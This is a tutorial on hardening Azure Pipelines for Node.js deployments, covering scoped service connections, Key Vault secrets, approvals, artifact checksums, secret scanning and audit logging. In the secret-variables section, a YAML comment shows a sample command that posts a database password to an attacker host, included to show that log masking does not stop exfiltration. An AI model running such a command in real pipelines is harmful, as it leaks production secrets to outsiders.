Securing Azure Pipelines: Service Connections and Secret Management
Azure Pipelines is powerful, but that power comes with serious security responsibilities. A misconfigured service connection or a leaked secret can hand an attacker the keys to your entire cloud infrastructure. This article covers the full spectrum of pipeline security — from service connection lockdown and Key Vault integration to audit logging and tampering prevention — with practical examples geared toward Node.js deployments.
Prerequisites
- An Azure DevOps organization with at least one project
- An Azure subscription with Contributor or Owner access
- Familiarity with YAML pipeline syntax
- Node.js 18+ installed locally
- Azure CLI installed and authenticated
- Basic understanding of Azure RBAC and service principals
Service Connection Types and Security
Service connections are the bridge between Azure Pipelines and external services. Each type carries different risk profiles, and understanding them is the first step toward securing your pipelines.
Azure Resource Manager (ARM) connections are the most common and the most dangerous when misconfigured. They come in several flavors:
- Workload Identity Federation (recommended) — Uses federated credentials with no stored secrets. The pipeline authenticates using an OIDC token exchange, eliminating the risk of credential leakage entirely.
- Service Principal with secret — A client ID and secret stored in Azure DevOps. The secret expires and must be rotated. Azure DevOps never displays the secret after creation, but any pipeline or user authorized to use the connection can exercise its permissions.
- Managed Identity — Available only for self-hosted agents running on Azure VMs. The identity is tied to the VM, reducing secret sprawl.
- Service Principal with certificate — More secure than a shared secret, but the certificate itself becomes a management burden.
Other connection types include Docker Registry, npm, NuGet, SSH, and generic service connections. Every one of these can store credentials, and every one should be treated as a high-value target.
The rule is simple: use Workload Identity Federation whenever possible. It is the only option that eliminates stored secrets from the equation entirely.
Creating Secure Service Connections
When you create a service connection, Azure DevOps gives you a checkbox that most people blindly enable: "Grant access permission to all pipelines." Do not check this box. Ever.
Here is how to create a properly scoped ARM service connection using the Azure CLI:
# Create a service principal with limited scope
az ad sp create-for-rbac \
--name "sp-myapp-production-deploy" \
--role "Contributor" \
--scopes "/subscriptions/<sub-id>/resourceGroups/myapp-production-rg" \
--years 1
# Output:
# {
# "appId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
# "displayName": "sp-myapp-production-deploy",
# "password": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
# "tenant": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
# }
Notice the --scopes flag. This limits the service principal to a single resource group. A common mistake is granting Contributor at the subscription level — that gives your pipeline access to every resource in the subscription, including resources it has no business touching.
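If you script connection setup, it is worth asserting the scope shape before handing it to az. A minimal Node.js sanity check (the helper name is illustrative):

```javascript
// Verify an Azure RBAC scope targets a resource group, not a whole
// subscription. Illustrative helper, not an official API.
function isResourceGroupScoped(scope) {
  // Expected shape: /subscriptions/<sub-id>/resourceGroups/<rg-name>
  var parts = scope.split("/").filter(function (p) { return p.length > 0; });
  return parts.length >= 4 &&
    parts[0] === "subscriptions" &&
    parts[2].toLowerCase() === "resourcegroups";
}

console.log(isResourceGroupScoped(
  "/subscriptions/0000-0000/resourceGroups/myapp-production-rg")); // true
console.log(isResourceGroupScoped("/subscriptions/0000-0000"));    // false
```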
For Workload Identity Federation, you create the service connection through the Azure DevOps UI and select "Workload Identity federation (automatic)" or configure it manually:
# Create a federated credential for the service principal
az ad app federated-credential create \
--id <app-object-id> \
--parameters '{
"name": "ado-federation",
"issuer": "https://vstoken.dev.azure.com/<org-id>",
"subject": "sc://myorg/myproject/my-service-connection",
"audiences": ["api://AzureADTokenExchange"]
}'
After creating the connection, immediately configure pipeline permissions so that only specific pipelines can use it.
Pipeline Permissions and Approvals
Service connection permissions work at two levels: who can manage the connection, and which pipelines can use it.
Navigate to Project Settings > Service connections > (your connection) > Security and you will see:
- User permissions — Who can use, administer, or view the connection
- Pipeline permissions — Which pipelines are authorized to reference this connection
Restrict pipeline permissions to only the pipelines that genuinely need the connection. For production service connections, go one step further and add approval checks:
- Open the service connection
- Click "Approvals and checks"
- Add an "Approvals" check
- Specify one or more approvers who must sign off before any pipeline run uses this connection
You can also add these checks:
- Business hours — Prevent production deployments at 3 AM on a Friday
- Branch control — Only allow the connection to be used from specific branches (e.g., refs/heads/main)
- Required template — Force pipelines to use a specific template, ensuring security controls cannot be bypassed
Branch control is particularly important. Without it, a developer could create a feature branch, modify the pipeline YAML to deploy to production, and bypass your entire release process.
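Branch control belongs on the resource itself, but a cheap in-script guard adds defense in depth. A sketch in Node.js — Build.SourceBranch reaches script steps as the BUILD_SOURCEBRANCH environment variable:

```javascript
// Defense-in-depth branch guard. The service connection's branch control
// check is the real enforcement point; this is an extra, illustrative layer.
function isAllowedBranch(sourceBranch, allowed) {
  return allowed.indexOf(sourceBranch) !== -1;
}

// Azure Pipelines exposes Build.SourceBranch as BUILD_SOURCEBRANCH.
var branch = process.env.BUILD_SOURCEBRANCH || "refs/heads/feature/demo";
if (!isAllowedBranch(branch, ["refs/heads/main"])) {
  console.error("Refusing to deploy from branch: " + branch);
  // In a real deployment step you would exit non-zero here: process.exit(1);
}
```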
Secret Variables and Variable Groups
Pipeline variables marked as secret are encrypted at rest and masked in logs. But they are not invisible to the pipeline itself — any script step can read them and exfiltrate them if it wants to.
variables:
- name: DB_PASSWORD
value: $(db-password) # Pulled from a variable group or defined as secret
steps:
- script: |
echo "Password is: $(DB_PASSWORD)"
# Azure DevOps will mask this in logs as ***
# But nothing stops a malicious script from:
# curl -X POST https://evil.com/capture -d "$(DB_PASSWORD)"
displayName: 'Use secret variable'
This is why pipeline permissions matter. If an untrusted pipeline can access a variable group containing production secrets, those secrets are compromised regardless of masking.
Variable groups should follow the principle of least privilege:
# Link only the variable group needed for this environment
variables:
- group: 'myapp-staging-secrets'
# NOT: 'myapp-production-secrets' in a staging pipeline
Lock variable groups with pipeline permissions the same way you lock service connections.
Azure Key Vault Integration
Variable groups backed by Azure Key Vault are the preferred approach for secret management. Secrets live in Key Vault, not in Azure DevOps, meaning you get centralized rotation, access policies, and audit logging.
Setting up a Key Vault-linked variable group:
- Create a Key Vault and add your secrets
- Grant the service connection's service principal the Key Vault Secrets User role on the vault
- In Azure DevOps, create a variable group and toggle "Link secrets from an Azure key vault"
- Select your service connection and vault
- Choose which secrets to expose
In your pipeline, reference Key Vault secrets just like regular variable group secrets:
variables:
- group: 'keyvault-myapp-production'
steps:
- task: AzureKeyVault@2
inputs:
azureSubscription: 'production-service-connection'
KeyVaultName: 'kv-myapp-prod'
SecretsFilter: 'DbConnectionString,ApiKey,JwtSecret'
RunAsPreJob: true
displayName: 'Fetch secrets from Key Vault'
- script: |
echo "Deploying with Key Vault secrets loaded"
node deploy.js
displayName: 'Deploy application'
env:
DB_CONNECTION: $(DbConnectionString)
API_KEY: $(ApiKey)
JWT_SECRET: $(JwtSecret)
The RunAsPreJob: true setting fetches secrets before any other step runs, making them available to the entire job. The SecretsFilter limits which secrets are pulled — do not use * in production.
Managing Secrets in YAML Pipelines
YAML pipelines store their definition in source control, which is both a strength (version history, code review) and a risk (secrets accidentally committed).
Never hardcode secrets in YAML files. Here is the correct pattern:
# azure-pipelines.yml
trigger:
branches:
include:
- main
pool:
vmImage: 'ubuntu-latest'
variables:
- group: 'myapp-secrets'
- name: nodeVersion
value: '20.x'
stages:
- stage: Build
jobs:
- job: BuildAndTest
steps:
- task: NodeTool@0
inputs:
versionSpec: '$(nodeVersion)'
- script: npm ci
displayName: 'Install dependencies'
- script: npm test
displayName: 'Run tests'
env:
DB_CONNECTION: $(TestDbConnection)
NODE_ENV: test
- stage: Deploy
dependsOn: Build
condition: and(succeeded(), eq(variables['Build.SourceBranch'], 'refs/heads/main'))
jobs:
- deployment: DeployProduction
environment: 'production'
strategy:
runOnce:
deploy:
steps:
- script: |
npm ci --production
node scripts/migrate.js
pm2 restart myapp
displayName: 'Deploy to production'
env:
DB_CONNECTION: $(ProdDbConnection)
API_KEY: $(ProdApiKey)
Notice that secrets are passed to scripts via the env block, not interpolated directly into the command line. This prevents them from appearing in process listings and reduces the risk of accidental logging.
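On the Node.js side, the deploy script should read those mapped variables from process.env and fail fast when one is missing. A sketch (the variable names match the env block above; the helper itself is illustrative):

```javascript
// deploy.js (sketch): consume secrets from environment variables mapped via
// the pipeline's env: block, never from command-line arguments.
function loadConfig(env) {
  var required = ["DB_CONNECTION", "API_KEY", "JWT_SECRET"];
  var missing = required.filter(function (name) { return !env[name]; });
  if (missing.length > 0) {
    // Fail fast so a misconfigured variable group surfaces immediately.
    throw new Error("Missing required secrets: " + missing.join(", "));
  }
  return {
    dbConnection: env.DB_CONNECTION,
    apiKey: env.API_KEY,
    jwtSecret: env.JWT_SECRET
  };
}

module.exports = loadConfig;
```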
Pipeline Agent Security
Self-hosted agents introduce their own set of risks. The agent runs on infrastructure you control, which means it has access to whatever that infrastructure has access to.
Key considerations for self-hosted agents:
- Dedicated agents per environment — Do not use the same agent pool for development and production builds. A compromised dev build could access production credentials cached on the agent.
- Ephemeral agents — Use scale-set agents or container-based agents that are destroyed after each run. This prevents credential persistence between builds.
- Network isolation — Place production agents in a network segment that can only reach production resources. Use NSGs or firewall rules to enforce this.
- Minimal tooling — Install only what the build needs. Every extra tool is an extra attack surface.
For Microsoft-hosted agents, the security model is simpler — each run gets a fresh VM that is destroyed afterward. But you trade control for convenience, and you cannot restrict network access from these agents.
# Use a dedicated agent pool for production deployments
pool:
name: 'production-agents'
demands:
- agent.os -equals Linux
- docker
Checkout and Artifact Tampering Prevention
Pipeline source code is fetched during the checkout step. By default, the pipeline checks out the repository that contains the YAML file, but it can check out additional repositories. Each checkout is a potential injection point.
Protect against tampering:
steps:
- checkout: self
clean: true
fetchDepth: 1
persistCredentials: false # Do not leave Git credentials on disk
# Verify artifact integrity before deployment
- script: |
sha256sum -c checksums.sha256
if [ $? -ne 0 ]; then
echo "##vso[task.logissue type=error]Artifact integrity check failed"
exit 1
fi
displayName: 'Verify artifact checksums'
Setting persistCredentials: false removes the OAuth token from the .git/config after checkout. This prevents subsequent steps from using the token to push malicious changes back to the repository.
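If you want to verify the cleanup, a post-checkout step can scan .git/config for the injected authorization header. A hypothetical Node.js check:

```javascript
// Hypothetical post-checkout verification: detect a leftover Azure DevOps
// OAuth token in .git/config (the http "extraheader" entry the agent injects).
function hasLeftoverCredentials(gitConfigText) {
  return /extraheader\s*=\s*AUTHORIZATION/i.test(gitConfigText);
}

// Usage in a script step, assuming the current directory is the checkout:
//   var fs = require("fs");
//   var text = fs.readFileSync(".git/config", "utf8");
//   if (hasLeftoverCredentials(text)) { process.exit(1); }
```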
For multi-repo checkout scenarios, limit which repositories a pipeline can access through project-level settings and require explicit authorization for each repository.
Pipeline Decorators for Security Policies
Pipeline decorators are organization-level extensions that inject steps into every pipeline automatically. They are the enforcement mechanism for security policies that cannot be optional.
A decorator might inject:
- A credential scanning step before any build
- A container image scanning step before any deployment
- An audit logging step at the start and end of every run
Decorators are defined as Azure DevOps extensions and installed at the organization level. Here is a simplified decorator structure:
{
"contributions": [
{
"id": "security-scan-decorator",
"type": "ms.azure-pipelines.pipeline-decorator",
"targets": ["ms.azure-pipelines-agent-job.pre-job-steps"],
"properties": {
"template": "security-scan.yml",
"targetsCondition": "always()"
}
}
]
}
The targetsCondition of always() ensures the decorator runs on every pipeline, regardless of what the pipeline author specifies. This is how you enforce organization-wide security scanning without trusting individual teams to add it themselves.
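The template a decorator injects will typically shell out to a scanner. As a sketch of the core idea, here is a minimal Node.js credential check — the patterns are illustrative, and real scanners (gitleaks, CredScan) use far richer rule sets:

```javascript
// Minimal credential scan of the kind a decorator-injected step might run.
// Patterns are illustrative only, not an exhaustive rule set.
var SECRET_PATTERNS = [
  /AKIA[0-9A-Z]{16}/,                                     // AWS access key id
  /-----BEGIN (RSA |EC )?PRIVATE KEY-----/,               // PEM private key
  /(password|secret|token)\s*[:=]\s*['"][^'"]{8,}['"]/i   // inline assignments
];

function scanForSecrets(text) {
  var findings = [];
  text.split("\n").forEach(function (line, i) {
    SECRET_PATTERNS.forEach(function (pattern) {
      if (pattern.test(line)) {
        findings.push({ line: i + 1, pattern: String(pattern) });
      }
    });
  });
  return findings;
}
```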
Secure Files Library
The Secure Files library stores files like certificates, provisioning profiles, and SSH keys in Azure DevOps with encryption at rest. Files can only be consumed by pipelines that have been explicitly authorized.
steps:
- task: DownloadSecureFile@1
name: sslCert
displayName: 'Download SSL certificate'
inputs:
secureFile: 'myapp-production.pfx'
- script: |
node scripts/deploy-with-cert.js
displayName: 'Deploy with certificate'
env:
CERT_PATH: $(sslCert.secureFilePath)
CERT_PASSWORD: $(CertificatePassword)
Like service connections and variable groups, secure files should have pipeline permissions locked down and approval checks configured for sensitive files.
Audit Logging for Pipeline Activities
Azure DevOps generates audit logs for pipeline-related events including service connection creation, variable group modifications, pipeline permission changes, and manual approvals. These logs are critical for incident response and compliance.
Access audit logs through Organization Settings > Auditing or query them programmatically:
var https = require("https");
var orgName = "myorg";
var pat = process.env.AZURE_DEVOPS_PAT;
function getAuditLogs(startDate, endDate, callback) {
var auth = Buffer.from(":" + pat).toString("base64");
var options = {
hostname: "auditservice.dev.azure.com",
path: "/" + orgName + "/_apis/audit/auditlog?startTime=" +
encodeURIComponent(startDate) +
"&endTime=" + encodeURIComponent(endDate) +
"&api-version=7.1-preview.1",
method: "GET",
headers: {
"Authorization": "Basic " + auth,
"Content-Type": "application/json"
}
};
var req = https.request(options, function(res) {
var body = "";
res.on("data", function(chunk) { body += chunk; });
res.on("end", function() {
var data = JSON.parse(body);
callback(null, data.decoratedAuditLogEntries);
});
});
req.on("error", function(err) { callback(err); });
req.end();
}
// Query audit logs for the last 24 hours
var now = new Date();
var yesterday = new Date(now.getTime() - 86400000);
getAuditLogs(yesterday.toISOString(), now.toISOString(), function(err, entries) {
if (err) {
console.error("Failed to fetch audit logs:", err.message);
return;
}
// Filter for security-relevant events
var securityEvents = entries.filter(function(entry) {
return entry.actionId.indexOf("Security") !== -1 ||
entry.actionId.indexOf("ServiceConnection") !== -1 ||
entry.actionId.indexOf("VariableGroup") !== -1;
});
securityEvents.forEach(function(event) {
console.log("[%s] %s - %s by %s",
event.timestamp,
event.actionId,
event.details,
event.actorDisplayName
);
});
});
Set up alerts for critical events: service connection creation, pipeline permission changes, and approval overrides. These are early indicators of either legitimate changes that need review or active compromise.
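A small filter on top of getAuditLogs above can drive those alerts. The action-id prefixes below are assumptions for illustration — verify them against the events your organization actually emits:

```javascript
// Flag audit entries whose action ids indicate high-risk changes.
// Prefixes are illustrative; confirm against your real audit log events.
var CRITICAL_PREFIXES = [
  "Library.ServiceConnection",   // service connection lifecycle
  "Security.ModifyPermission",   // permission changes
  "Checks."                      // approval/check configuration
];

function isCriticalEvent(entry) {
  return CRITICAL_PREFIXES.some(function (prefix) {
    return entry.actionId && entry.actionId.indexOf(prefix) === 0;
  });
}
```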
RBAC for Pipeline Resources
Azure DevOps RBAC for pipelines operates at multiple levels: organization, project, folder, and individual pipeline. The most common mistake is granting broad permissions at the project level when they should be scoped to specific folders or pipelines.
Key roles:
- Reader — Can view pipeline definitions and runs but cannot queue builds
- User — Can queue builds and view definitions
- Build Administrator — Can manage pipeline definitions, permissions, and agent pools
- Project Administrator — Full control over all pipeline resources
For service connections and environments, create custom security groups:
Production Deployers → Can use production service connections
Staging Deployers → Can use staging service connections
Pipeline Admins → Can create/modify service connections
Never add individual users directly to resource permissions. Always use groups, because when someone leaves the team, you update one group membership instead of hunting through dozens of resource permissions.
Pipeline Isolation and Security Gates
Environments in Azure DevOps provide a deployment target abstraction with built-in approval and check mechanisms. Use them to create security gates that prevent unauthorized deployments.
stages:
- stage: DeployStaging
jobs:
- deployment: DeployToStaging
environment: 'staging'
strategy:
runOnce:
deploy:
steps:
- script: echo "Deploying to staging"
- stage: SecurityGate
dependsOn: DeployStaging
jobs:
- job: SecurityScan
steps:
- script: |
npm audit --audit-level=high
if [ $? -ne 0 ]; then
echo "##vso[task.logissue type=error]High severity vulnerabilities found"
exit 1
fi
displayName: 'Security audit'
- script: |
npx snyk test --severity-threshold=high
displayName: 'Snyk vulnerability scan'
- stage: DeployProduction
dependsOn: SecurityGate
condition: succeeded()
jobs:
- deployment: DeployToProduction
environment: 'production' # Has manual approval configured
strategy:
runOnce:
deploy:
steps:
- script: echo "Deploying to production"
Configure the production environment with:
- Manual approval from a designated approver
- Branch control limiting deployments to main only
- Business hours check to prevent off-hours deployments
- Exclusive lock to prevent concurrent deployments
Complete Working Example
Here is a complete, production-ready pipeline configuration for a Node.js application with Key Vault integration, service connection approvals, and a secret rotation pattern.
Pipeline YAML
# azure-pipelines.yml
trigger:
branches:
include:
- main
paths:
exclude:
- '*.md'
- 'docs/**'
pr:
branches:
include:
- main
pool:
vmImage: 'ubuntu-latest'
variables:
- name: nodeVersion
value: '20.x'
- name: appName
value: 'myapp-api'
stages:
# ── Build & Test ───────────────────────────────
- stage: Build
displayName: 'Build and Test'
jobs:
- job: BuildJob
steps:
- checkout: self
clean: true
fetchDepth: 1
persistCredentials: false
- task: NodeTool@0
inputs:
versionSpec: '$(nodeVersion)'
displayName: 'Install Node.js'
- script: npm ci
displayName: 'Install dependencies'
- script: npm audit --audit-level=high
displayName: 'Security audit'
continueOnError: false
- script: npm test
displayName: 'Run tests'
env:
NODE_ENV: test
- script: |
mkdir -p $(Build.ArtifactStagingDirectory)/app
cp -r src package.json package-lock.json $(Build.ArtifactStagingDirectory)/app/
cd $(Build.ArtifactStagingDirectory)/app && npm ci --production
cd $(Build.ArtifactStagingDirectory) && tar czf app.tar.gz app/
sha256sum app.tar.gz > checksums.sha256
displayName: 'Package application'
- publish: $(Build.ArtifactStagingDirectory)
artifact: drop
displayName: 'Publish artifact'
# ── Deploy to Staging ──────────────────────────
- stage: Staging
displayName: 'Deploy to Staging'
dependsOn: Build
condition: and(succeeded(), eq(variables['Build.SourceBranch'], 'refs/heads/main'))
jobs:
- deployment: DeployStaging
environment: 'staging'
strategy:
runOnce:
deploy:
steps:
- task: AzureKeyVault@2
inputs:
azureSubscription: 'staging-service-connection'
KeyVaultName: 'kv-myapp-staging'
SecretsFilter: 'DbConnectionString,ApiKey,JwtSecret'
RunAsPreJob: true
displayName: 'Fetch staging secrets'
- download: current
artifact: drop
- script: |
cd $(Pipeline.Workspace)/drop
sha256sum -c checksums.sha256
displayName: 'Verify artifact integrity'
- task: AzureCLI@2
inputs:
azureSubscription: 'staging-service-connection'
scriptType: 'bash'
scriptLocation: 'inlineScript'
inlineScript: |
az webapp deploy \
--resource-group myapp-staging-rg \
--name $(appName)-staging \
--src-path $(Pipeline.Workspace)/drop/app.tar.gz \
--type zip
displayName: 'Deploy to staging App Service'
- script: |
sleep 30
STATUS=$(curl -s -o /dev/null -w "%{http_code}" https://$(appName)-staging.azurewebsites.net/health)
if [ "$STATUS" != "200" ]; then
echo "##vso[task.logissue type=error]Health check failed with status $STATUS"
exit 1
fi
echo "Health check passed"
displayName: 'Smoke test'
# ── Deploy to Production ───────────────────────
- stage: Production
displayName: 'Deploy to Production'
dependsOn: Staging
condition: succeeded()
jobs:
- deployment: DeployProduction
environment: 'production' # Manual approval + branch control configured
strategy:
runOnce:
deploy:
steps:
- task: AzureKeyVault@2
inputs:
azureSubscription: 'production-service-connection'
KeyVaultName: 'kv-myapp-prod'
SecretsFilter: 'DbConnectionString,ApiKey,JwtSecret,SessionSecret'
RunAsPreJob: true
displayName: 'Fetch production secrets'
- download: current
artifact: drop
- script: |
cd $(Pipeline.Workspace)/drop
sha256sum -c checksums.sha256
displayName: 'Verify artifact integrity'
- task: AzureCLI@2
inputs:
azureSubscription: 'production-service-connection'
scriptType: 'bash'
scriptLocation: 'inlineScript'
inlineScript: |
# Deploy to staging slot first
az webapp deploy \
--resource-group myapp-production-rg \
--name $(appName) \
--slot staging \
--src-path $(Pipeline.Workspace)/drop/app.tar.gz \
--type zip
# Warm up the staging slot
sleep 30
curl -s https://$(appName)-staging.azurewebsites.net/health
# Swap slots
az webapp deployment slot swap \
--resource-group myapp-production-rg \
--name $(appName) \
--slot staging \
--target-slot production
displayName: 'Blue-green deploy to production'
- script: |
STATUS=$(curl -s -o /dev/null -w "%{http_code}" https://$(appName).azurewebsites.net/health)
if [ "$STATUS" != "200" ]; then
echo "##vso[task.logissue type=error]Production health check failed"
echo "##vso[task.logissue type=warning]Initiating rollback"
az webapp deployment slot swap \
--resource-group myapp-production-rg \
--name $(appName) \
--slot staging \
--target-slot production
exit 1
fi
echo "Production deployment verified"
displayName: 'Verify and rollback on failure'
Secret Rotation Script
This Node.js script rotates secrets in Azure Key Vault and can be triggered on a schedule or as part of a maintenance pipeline:
var crypto = require("crypto");
var https = require("https");
var childProcess = require("child_process");
function generateSecret(length) {
return crypto.randomBytes(length).toString("base64url");
}
function execAzCommand(command, callback) {
childProcess.exec("az " + command, function(error, stdout, stderr) {
if (error) {
callback(new Error("az command failed: " + stderr));
return;
}
try {
var result = JSON.parse(stdout);
callback(null, result);
} catch (e) {
callback(null, stdout.trim());
}
});
}
function rotateKeyVaultSecret(vaultName, secretName, callback) {
var newValue = generateSecret(32);
// NOTE: passing the secret as a CLI argument briefly exposes it in local
// process listings; the Key Vault REST API or SDK avoids this if that matters.
var setCmd = 'keyvault secret set' +
' --vault-name ' + vaultName +
' --name ' + secretName +
' --value ' + newValue +
' --tags rotatedAt=' + new Date().toISOString().split("T")[0];
execAzCommand(setCmd, function(err, result) {
if (err) {
console.error("Failed to rotate " + secretName + ":", err.message);
callback(err);
return;
}
console.log("Rotated %s (version: %s)", secretName, result.id);
callback(null, {
name: secretName,
version: result.id,
rotatedAt: new Date().toISOString()
});
});
}
function rotateAllSecrets(vaultName, secretNames, callback) {
var results = [];
var errors = [];
var completed = 0;
secretNames.forEach(function(name) {
rotateKeyVaultSecret(vaultName, name, function(err, result) {
completed++;
if (err) {
errors.push({ name: name, error: err.message });
} else {
results.push(result);
}
if (completed === secretNames.length) {
if (errors.length > 0) {
console.error("Rotation errors:", JSON.stringify(errors, null, 2));
}
console.log("Rotation complete: %d succeeded, %d failed",
results.length, errors.length);
callback(errors.length > 0 ? errors : null, results);
}
});
});
}
// Rotate secrets that should be cycled regularly
var vaultName = process.env.KEY_VAULT_NAME || "kv-myapp-prod";
var secretsToRotate = [
"JwtSecret",
"SessionSecret",
"ApiKey",
"WebhookSigningKey"
];
rotateAllSecrets(vaultName, secretsToRotate, function(errors, results) {
if (errors) {
process.exit(1);
}
console.log("All secrets rotated successfully");
console.log(JSON.stringify(results, null, 2));
});
Health Check Endpoint
The health check endpoint referenced in the pipeline should validate that the application can reach its dependencies:
var express = require("express");
var router = express.Router();
router.get("/health", function(req, res) {
var checks = {
status: "healthy",
timestamp: new Date().toISOString(),
version: process.env.BUILD_NUMBER || "local",
checks: {}
};
// Check database connectivity
var db = require("../models/dataAccess");
db.ping(function(err) {
checks.checks.database = err ? "unhealthy" : "healthy";
// Check external API reachability
var https = require("https");
var apiReq = https.get(process.env.API_HEALTH_URL || "https://api.example.com/health", function(apiRes) {
checks.checks.externalApi = apiRes.statusCode === 200 ? "healthy" : "degraded";
finalize();
});
apiReq.on("error", function() {
checks.checks.externalApi = "unhealthy";
finalize();
});
apiReq.setTimeout(5000, function() {
apiReq.destroy();
checks.checks.externalApi = "timeout";
finalize();
});
});
function finalize() {
var allHealthy = Object.keys(checks.checks).every(function(key) {
return checks.checks[key] === "healthy";
});
checks.status = allHealthy ? "healthy" : "degraded";
var statusCode = allHealthy ? 200 : 503;
res.status(statusCode).json(checks);
}
});
module.exports = router;
Common Issues and Troubleshooting
1. "The service connection could not be found"
This happens when a pipeline references a service connection it does not have permission to use. Go to the service connection's pipeline permissions and explicitly authorize the pipeline. If you recently renamed the pipeline or moved it to a different folder, the authorization may have been lost.
2. "Access denied: The caller does not have permission to perform action on resource"
The service principal behind the service connection lacks the required Azure RBAC role. Check the scope and role assignment:
az role assignment list --assignee <service-principal-app-id> --output table
Common fix: the service principal has Contributor on the wrong resource group, or the resource group name has changed since the role was assigned.
3. "Key Vault secret retrieval failed with status 403"
The service principal does not have Key Vault access. With Azure RBAC (recommended over access policies):
az role assignment create \
--assignee <service-principal-app-id> \
--role "Key Vault Secrets User" \
--scope "/subscriptions/<sub-id>/resourceGroups/<rg>/providers/Microsoft.KeyVault/vaults/<vault-name>"
If using access policies instead of RBAC, ensure the principal has "Get" and "List" permissions for secrets.
4. "Pipeline run was rejected because it uses a protected resource"
This means an approval check is blocking the run. Check the "Checks" tab on the pipeline run to see which resource requires approval and who the designated approvers are. If you are the approver, you can approve directly from the pipeline run page. If the approver has left the organization, update the approval check configuration on the resource.
5. "Secret variables are empty or not populated in scripts"
Secret variables must be explicitly mapped to environment variables in script tasks. They are not automatically available as environment variables for security reasons:
# Wrong - secret will be empty
- script: echo $MY_SECRET
# Correct - explicitly map the secret
- script: echo $MY_SECRET
env:
MY_SECRET: $(mySecretVariable)
6. "Workload Identity Federation token exchange failed"
The federated credential's subject, issuer, or audience does not match what Azure DevOps sends. Double-check the service connection name in the subject claim matches exactly, including the organization and project name casing.
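A quick way to rule out subject mismatches is to reconstruct the expected claim and compare it character for character. A small illustrative helper:

```javascript
// Build the subject claim Azure DevOps presents during the OIDC exchange:
// sc://<org>/<project>/<service-connection-name>. Comparison is case-sensitive.
function expectedSubject(org, project, connectionName) {
  return "sc://" + org + "/" + project + "/" + connectionName;
}

function subjectsMatch(configured, org, project, connectionName) {
  // Strict equality catches casing and whitespace differences.
  return configured === expectedSubject(org, project, connectionName);
}
```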
Best Practices
Use Workload Identity Federation over service principal secrets. Federation eliminates stored credentials entirely. No secrets to rotate, no secrets to leak. This should be the default for all new ARM service connections.
Scope service principals to the minimum required resources. A service principal for deploying a single App Service does not need Contributor access to the entire subscription. Use resource group or even resource-level scoping.
Never grant pipeline access to all service connections or variable groups. Disable "Grant access permission to all pipelines" on every protected resource. Authorize pipelines individually and review authorizations quarterly.
Back variable groups with Azure Key Vault. Key Vault provides centralized secret management, rotation support, access policies, and audit logging that Azure DevOps variable groups alone cannot match.
Enforce branch control on production resources. Configure branch control checks on production service connections and environments so that only the main branch can trigger production deployments. This prevents end-runs around your release process.
Implement artifact integrity verification. Generate checksums during the build stage and verify them before deployment. This catches tampering between stages, whether from a compromised agent or a supply chain attack.
Use pipeline decorators for organization-wide security policies. Decorators ensure that security scanning, credential detection, and audit logging happen on every pipeline without relying on individual teams to add these steps.
Rotate secrets on a schedule. Automated secret rotation through Key Vault reduces the window of exposure if a secret is compromised. Set up a maintenance pipeline that rotates secrets monthly and tags them with rotation dates.
Audit service connection usage regularly. Review audit logs for unexpected service connection access, permission changes, and failed authentication attempts. Set up alerts for critical events.
Isolate agent pools by environment. Production workloads should run on dedicated agents that are network-isolated from development and staging environments. Use ephemeral agents where possible to prevent credential persistence.
References
- Azure Pipelines Security Best Practices — Microsoft's official security guidance
- Manage Service Connections — Service connection configuration and types
- Use Azure Key Vault Secrets in Azure Pipelines — Key Vault integration walkthrough
- Pipeline Approvals and Checks — Configuring approval gates
- Workload Identity Federation for Azure Pipelines — Federation setup guide
- Azure DevOps Audit Logging — Audit log access and streaming